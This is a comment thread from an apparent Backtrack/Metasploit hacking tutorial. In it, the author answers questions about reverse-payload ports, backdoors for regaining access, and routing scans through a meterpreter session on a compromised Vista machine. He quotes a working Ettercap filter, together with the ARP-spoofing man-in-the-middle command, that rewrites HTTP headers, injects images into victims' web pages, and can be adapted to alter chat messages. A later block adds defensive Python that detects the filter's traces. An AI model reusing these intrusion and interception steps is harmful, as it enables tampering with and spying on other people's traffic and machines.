Glad to be of help
~phoenix910
Thank you very much phoenix910.
I have some questions:
1) I read that I have to put a high port number: I put 5555 and it works perfectly on my LAN, but when I put for example port 80, 100, 500... I get no positive response (all the payloads are used for high ports only; for example, if I have an outgoing firewall filter for high port numbers, what should I do??)
2) When I connect successfully to my PC and then, for some reason, there is a disconnection between these 2 PCs, is there any trick to reconnect to it without re-opening the output.exe on the PC?? (without the usage of netcat)
Thanks
In theory, any port that isn't being used by either OS should work - however, 80 is often used, as you figured in your example. My advice would be to just modify your firewall's security settings.
And no, unless you've installed a backdoor, there isn't any way to reconnect once you've disconnected - unless the disconnection is between you and a remote shell, and the actual metasploit session stays open; in which case, you can just re-start interaction with that particular session. But if the disconnection happens between server and client, then unless you've installed some form of backdoor (be it user account, remote shell, etc.), you won't be able to get back in without running the executable.
~phoenix910
In my case, 192.168.1.1 is the remote router... I did this:
meterpreter > route
Network routes
==============
Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          192.168.1.1
127.0.0.0        255.0.0.0        127.0.0.1
127.0.0.1        255.255.255.255  127.0.0.1
127.255.255.255  255.255.255.255  127.0.0.1
192.168.1.0      255.255.255.0    192.168.1.2
192.168.1.2      255.255.255.255  192.168.1.2
192.168.1.255    255.255.255.255  192.168.1.2
224.0.0.0        240.0.0.0        127.0.0.1
224.0.0.0        240.0.0.0        192.168.1.2
255.255.255.255  255.255.255.255  127.0.0.1
255.255.255.255  255.255.255.255  192.168.1.2
meterpreter >
Background session 2? [y/N]
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 2
msf exploit(handler) > route print
Active Routing Table
====================
Subnet           Netmask          Gateway
------           -------          -------
192.168.1.0      255.255.255.0    Session 2
msf exploit(handler) > nmap -sS -sV -T 5 -P0 -O 192.168.1.1
[*] exec: nmap -sS -sV -T 5 -P0 -O 192.168.1.1
Starting Nmap 4.85BETA3 ( http://nmap.org ) at 2009-03-11 23:25 GMT
Interesting ports on 192.168.1.1:
Not shown: 996 filtered ports
PORT     STATE SERVICE VERSION
23/tcp   open  telnet?
53/tcp   open  domain?
80/tcp   open  http?
5000/tcp open  upnp?
MAC Address: 00:22:3F:B5:0B0 (Netgear)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|switch
Running: Actiontec Linux 2.4.X, HP embedded, Linksys embedded, Netgear embedded
OS details: HP Brocade 4100 switch; or Actiontec MI-424-WR, Linksys WRVS4400N, or Netgear WNR834B wireless broadband router
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
msf exploit(handler) >
However, 00:22:3F:B5:0B0 is the router belonging to the BT3 box, NOT to the compromised Vista box. Any idea what's going wrong here?
You need it to be on a separate local IP range, as far as I'm aware, otherwise you'll end up scanning yourself.
~phoenix910
Wow great tutorial!! I am interested in the Ettercap portion of the article. Do you have any other guides about filters you have created using ettercap?
I hate Google.
Well, I haven't written any majorly different guides specifically on that, only another similar explanation from a previous tutorial:

Manipulating the Packets:

The possibilities of packet manipulation are endless, bound only by your creativity, and the time you are willing to spend exploring the different protocols and how they work and their relations with inbound traffic and outbound traffic on the network. Ettercap comes with its own built-in filter creator, as well as a few of its own pre-made packets. Building your own filter requires a basic knowledge of how programming languages work, or the ability to analyse and determine how the Ettercap filters work, which is relatively simple if you are used to analysing data/packet streams with programs such as Wireshark. Open a new console, and type:

bt ~ # kedit filter.pic

Then copy and paste the following into the window that comes up:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("Modified Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}
if (ip.proto == UDP && udp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}

[snapshot7.png] Caption: Image Replacement in Action

Save this, and then close Kedit. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:

bt ~ # etterfilter filter.pic -o filter.ef

You will see a few things happen, and then the filter will be created. Basically, the code is fairly simple. The "if (ip.proto == TCP && tcp.dst/src == 80)" basically tells Ettercap to only pay attention to the TCP protocol packets on either the destination to port 80, or the source from port 80 (which is all web related traffic), and then to follow the instructions that come after that - being to search that packet for a string, then replace it with what you would like that string to read. You will also notice that in replacing the strings, we must keep the length of the two strings the same - be careful to make sure you do this, or it won't work. Now to make this filter run during your MiTM attack, we must use a slightly altered Ettercap command. The command to use is (assuming you saved the filter in the /root folder):

bt ~ # sudo ettercap -T -q -F filter.ef -M arp:remote /$IP/ -P autoadd

Now move to another computer, and navigate to a website, and see a lot of pictures being replaced with the image you specified! This can be quite funny. Alternatively, you can see the images being replaced by watching the output of your console session. The filter we created won't work with absolutely every website because of the many various ways of including images, but it will work with many of them. Applying this same principle, you can for example figure out the port of a Messenger program, and modify the outgoing packets to include words of your own - for example replacing something like "How are you" with something like "I hate you!" (notice still the same amount of characters - this is essential in general packet manipulation, however, is not necessary in our image filter, as we are adding to what is already there [via the use of the slashes], not modifying). Explore, and have fun with this.

But that's from one of my other Ettercap-related articles. If you want more specific stuff, take a look at the structure of that, and the packets you want to manipulate, and write your own, or Google search around a bit for other examples.
~phoenix910
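The filter quoted above leaves two recognisable traces on the wire: a request header literally named Accept-Rubbish! (a browser never sends that) and img tags carrying two src attributes, because replace() prepends a second src rather than substituting the original. The following Python, an added example that is not part of phoenix910's comment or tutorial, checks a captured request and response body for those traces and also checks the tutorial's equal-length rule for a replace() pair; the sample request, HTML and image host are constructed.

```python
"""Detect the on-wire artifacts of the Ettercap image-replacement filter.
Added example with constructed sample data; not code from the tutorial."""
import re

# Header the filter writes over Accept-Encoding (both are 15 characters).
MANGLED_HEADER = "Accept-Rubbish!"

# The filter turns 'img src=' into 'img src="..." ' and leaves the original
# src in place, so the tell-tale is an <img> tag with more than one src.
IMG_TAG_RE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR_RE = re.compile(r"\bsrc\s*=", re.IGNORECASE)


def request_was_mangled(raw_request: str) -> bool:
    """True if a client request carries the filter's bogus header name.

    Seen in a web server's header log, it means Accept-Encoding was
    rewritten somewhere between the browser and the server."""
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if not line:                               # blank line ends headers
            break
        if line.split(":", 1)[0].strip() == MANGLED_HEADER:
            return True
    return False


def injected_img_tags(html: str) -> list:
    """Return every <img> tag whose src attribute appears more than once."""
    return [tag for tag in IMG_TAG_RE.findall(html)
            if len(SRC_ATTR_RE.findall(tag)) > 1]


def replacement_keeps_length(old: str, new: str) -> bool:
    """The tutorial's rule: a replace() pair must not change packet length."""
    return len(old) == len(new)


# Constructed samples: a request after the header rewrite, and a response
# body after the filter prepended its own src (host is a placeholder).
SAMPLE_REQUEST = ("GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                  "Accept-Rubbish!: gzip, deflate\r\n\r\n")
SAMPLE_HTML = ('<html><body><img src="http://replaced.example/x.png" '
               'src="/logo.png"><img src="/untouched.png"></body></html>')

if __name__ == "__main__":
    print(request_was_mangled(SAMPLE_REQUEST))                           # True
    print(injected_img_tags(SAMPLE_HTML))                                # 1 tag
    print(replacement_keeps_length("Accept-Encoding", "Accept-Rubbish!"))  # True
```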
phoenix910 thanks for the articles you posted, great work!!